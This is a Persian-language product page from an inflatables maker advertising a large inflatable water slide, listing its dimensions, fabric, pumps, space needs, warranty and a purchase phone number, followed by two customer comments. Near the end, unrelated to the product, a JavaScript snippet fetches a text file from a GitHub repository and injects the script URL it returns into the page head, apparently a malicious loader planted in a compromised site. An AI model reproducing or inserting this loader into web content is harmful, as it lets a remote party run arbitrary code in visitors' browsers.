بزرگترین سرسره بادی آبی در کشور
بزرگترین سرسره بادی در ایران

بزرگترین سرسره بادی آبی در کشور

  • شرکت بادی سازان مجد مفتخر است بزرگترین سرسره بادی آبی کشور را تولید و و به بهره برداری رسانده است. این سرسره در حال حاضر بزرگترین سرسره بادی کشور (و همچنین بزرگترین سرسره بادی – آبی کشور) معرفی شده است.

    اطلاعات بزرگترین سرسره بادی – آبی کشور

    ابعاد

    بزرگترین سرسره بادی آبی کشور به طول 45 متر و عرض 13.5 متر و همچنین ارتفاع 13 متر می باشد. وزن این سرسره چیزی در حدود 1500 کیلوگرم است. البته این مقادیر کاملا قابل تغییر و سفارشی سازی می باشند. جهت خرید شما می توانید با شماره تلفن 09127484573 تماس حاصل فرمایید.

    جنس

    این سرسره از دوخت دقیقی با نخ ترکیه ای برخوردار است که توسط ماهر ترین کارکنان شرکت بادی سازان مجد ( مجد سازه ) تولید و بهره برداری می شود. همچنین پارچه این سرسره پارچه کره ای با کیفیت بالا می باشد تا بتواند در حد امکان استهلاک را کاهش دهد.

    لوازم جانبی

    این سرسره دارای روکش سر می باشد که در صورت خرابی می توانید مجددا با کمترین هزینه آن را تهیه نمایید. همچنین این سرسره دارای دو پمپ به مقادیر 1.5 و 1 اسب می باشد تا بتواند تمام فصای مورد نیاز را باد کند.

    برای مهار این سازه شما نیازمند حدودا 60 بند مهار می باشید که در زمان خرید می توانید تهیه نمایید. همچنین این سرسره به روانداز و زیر انداز نیازمند است تا استهلاک و خرابی را کاهش دهد.

    همچنین برای راهنمایی بیشتر می توانید مقاله نحوه نگهداری از سرسره بادی را بخوانید.

    بزرگترین سرسره بادی آبی در کشور

    فضای مورد نیاز برای سرسره بزرگ بادی

    حداقل فضای مورد نیاز برای بزرگترین سرسره بادی آبی کشور یک محیط 20 در 60 متر می باشد. به صورت پیشنهادی شما می توانید این سرسره را در سواحل آبی دریای خزر و یا جنوب کشور راه اندازی نمایید. اما امکان راه اندازی آن در پارک های آبی نیز موجود است.

    در صورتی که می خواهید یک شهر بازی احداث کنید می توانید مقال احداث شهربازی را بخوانید.

    استاندارد و ضمانت

    مدت زمان استاندارد این سرسره 5 سال می باشد. اما نگران نباشید، پس از اتمام مدت استاندارد شما می توانید از طریق همین شرکت اقدام به تمدید و یا در صورت خرابی اقدام به تعمیر و یا تعویض نمایید.

    سرسره بزرگ بادی شرکت بادی سازان مجد دارای 2 سال ضمانت و خدمات پس از فروش می باشد. در صورت هر گونه سوال و یا مشکل؛ و همچنین اقدام به خرید شما می توانید با شماره تلفن 09127484573 تماس حاصل نمایید.

    در صورتی که تمایل به خرید دیگر محصولات بادی سازان مجد را دارید می توانید به صفحه فروشگاه مراجعه کنید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۳ رای

    این پست دارای 2 نظر است

    1. محمد علیاری

      سلام چطور می تونم خریداری کنم؟

      1. majdsazeh

        سلام جهت خرید بزرگترین سرسره بادی کشور به کد KM-167 می توانید با شماره تلفن 09127484573 تماس بگیرید.

    دیدگاهتان را بنویسید